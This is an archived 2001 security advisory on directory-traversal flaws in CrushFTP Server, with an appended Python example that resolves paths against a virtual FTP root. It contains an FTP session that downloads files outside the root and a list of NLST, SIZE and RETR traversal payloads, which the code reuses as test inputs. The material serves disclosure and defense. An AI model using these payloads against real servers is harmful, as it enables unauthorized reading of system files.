----- Begin Hush Signed Message from joetestaat_private -----

Vulnerabilities in CrushFTP Server

Overview

CrushFTP Server 2.1.4 is a Java FTP server available from http://www.crushftp.com. Multiple vulnerabilities exist which allow users to change directories outside of the FTP root and download files.

Details

The following is an illustration of the problem. An FTP root of "c:\directory\directory" was used.

>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK. Need password.
Password:
230-Welcome!
230 Password OK. Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

The vendor issued two versions since I made initial contact to address additional variations. The following is a list of vulnerabilities which affected these intermediate versions (v2.1.5, v2.1.6):

NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat

Solution

Upgrade to v2.1.7 at: http://www.crushftp.com

Vendor Status

The program author, Ben Spink, was contacted via <spinkbat_private> on Friday, April 20, 2001. I would like to thank him for taking this matter seriously and showing extra effort to resolve these problems.
- Joe Testa
e-mail: joetestaat_private
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron
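The variants in the advisory (".." and "..." in both slash styles, mixed "./\...\" prefixes, absolute "/../" forms) all exploit the same weakness: the server joined client-supplied path text onto the real root and then trusted the result. The added example below, which is not CrushFTP's code and not part of the original post, shows the defensive pattern that closes the whole class at once: every client path is first resolved onto a virtual tree whose top is the FTP root, with ".." only ever popping a component that is actually on the stack and dot-only components such as "..." rejected outright, and only then is the virtual path joined onto the real root with a final containment check. The root "/srv/ftp", the cwd values, and the benign request list are constructed; the traversal strings are the ones listed in the advisory.

```python
# Added example (not CrushFTP's code): virtual-path resolution for an FTP
# server so that client-supplied paths cannot name files outside the FTP root.
# Assumes a POSIX-style root "/srv/ftp" (constructed); the advisory's real root
# was a Windows path, but the per-component logic is the same.
import posixpath

FTP_ROOT = "/srv/ftp"  # constructed example root, not the advisory's


class PathDenied(Exception):
    """Raised for any client path that is not a plain descent from the root."""


def _components(path: str) -> list[str]:
    # CrushFTP ran on Windows, where "\" is a separator too; the advisory's
    # variants mix "/" and "\", so both are split alike. Empty and "." parts
    # (from "//", "./", a trailing "/") carry no meaning and are dropped.
    return [c for c in path.replace("\\", "/").split("/") if c not in ("", ".")]


def resolve_virtual(cwd: str, requested: str) -> str:
    """Map `requested` (absolute, or relative to `cwd`) to a virtual path
    beginning at "/" (the FTP root). Every component must be a plain name;
    ".." may only pop a component that is actually on the stack."""
    absolute = requested[:1] in ("/", "\\")
    stack: list[str] = [] if absolute else _components(cwd)
    for comp in _components(requested):
        if comp == "..":
            if not stack:
                raise PathDenied(f"{requested!r} climbs above the FTP root")
            stack.pop()
        elif set(comp) == {"."}:
            # "...", "...." are DOS/Windows parent-directory shortcuts (the
            # "cd ..." in the advisory); they are never a legitimate name.
            raise PathDenied(f"{requested!r} uses dot-only component {comp!r}")
        elif ":" in comp or "\0" in comp:
            # ":" could select a drive or an NTFS stream; NUL truncates C strings.
            raise PathDenied(f"{requested!r} contains an illegal character")
        else:
            stack.append(comp)
    return "/" + "/".join(stack)


def to_real_path(ftp_root: str, cwd: str, requested: str) -> str:
    """Join the virtual path onto the real root and re-check containment,
    so that a future bug in resolve_virtual still cannot escape the root."""
    root = posixpath.normpath(ftp_root)
    virtual = resolve_virtual(cwd, requested)
    real = posixpath.normpath(posixpath.join(root, virtual.lstrip("/")))
    if real != root and not real.startswith(root + "/"):
        raise PathDenied(f"{real!r} is outside {root!r}")
    return real


def is_allowed(cwd: str, requested: str, ftp_root: str = FTP_ROOT) -> bool:
    """True if the request maps inside the root, False if it is denied."""
    try:
        to_real_path(ftp_root, cwd, requested)
        return True
    except PathDenied:
        return False


# The traversal variants listed in the advisory (issued from the root "/").
ADVISORY_VARIANTS = [
    "../../autoexec.bat", "...", "..", "/../../", "/.../", "\\..\\", "/../",
    "\\...\\", "\\..\\.\\..\\autoexec.bat", "./\\...\\autoexec.bat",
    ".\\.\\..\\..\\autoexec.bat",
]
# Constructed ordinary requests issued from a subdirectory of the root.
BENIGN_REQUESTS = ["readme.txt", "pub/docs/readme.txt", "/", "..", "./pub"]


if __name__ == "__main__":
    for req in ADVISORY_VARIANTS:
        verdict = "ALLOW" if is_allowed("/", req) else "DENY "
        print(f"{verdict} {req!r} from /")
    for req in BENIGN_REQUESTS:
        verdict = "ALLOW" if is_allowed("/pub/incoming", req) else "DENY "
        print(f"{verdict} {req!r} from /pub/incoming")
```

Note that ".." is not banned as a string: from "/pub/incoming" it legitimately resolves to "/pub", while from "/" it is refused because there is nothing left to pop. That is the difference between rejecting patterns (which the intermediate v2.1.5 and v2.1.6 releases show is a losing game) and resolving against a virtual root where escape is impossible by construction.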
This archive was generated by hypermail 2b30 : Thu May 03 2001 - 21:37:08 PDT